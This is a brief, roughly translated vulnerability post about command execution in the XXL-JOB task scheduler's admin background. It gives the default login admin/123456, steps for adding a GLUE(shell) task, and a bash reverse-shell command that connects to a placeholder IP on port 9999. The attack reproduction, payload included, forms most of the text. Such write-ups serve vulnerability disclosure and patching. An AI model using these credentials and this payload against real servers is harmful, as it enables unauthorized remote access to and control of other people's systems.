Xxl Job Task Scheduling Center Any Command Execution Vulnerability In The Background
Xxl Job Task Scheduling Center Any Command Execution Vulnerability In The Background
XXL-JOB Task Scheduling Center Any command execution vulnerability in the background
Vulnerability Description
XXL-JOB Task Scheduling Center Attackers can obtain server permissions by writing shell commands in the background
Vulnerability Impact
XXL-JOB
Network surveying and mapping
Vulnerability reappears
Log in to the background to add a task
Default password admin/123456
Note that the operation mode needs to be GLUE(shell)
Click GLUE IDE to edit the script
Execute the detection network, and whether the task call can be executed to rebound a shell
#!/bin/bash
bash -c 'exec bash -i &>/dev/tcp/xxx.xxx.xxx.xxx/9999 <&1'
This post is licensed under CC BY 4.0 by the author.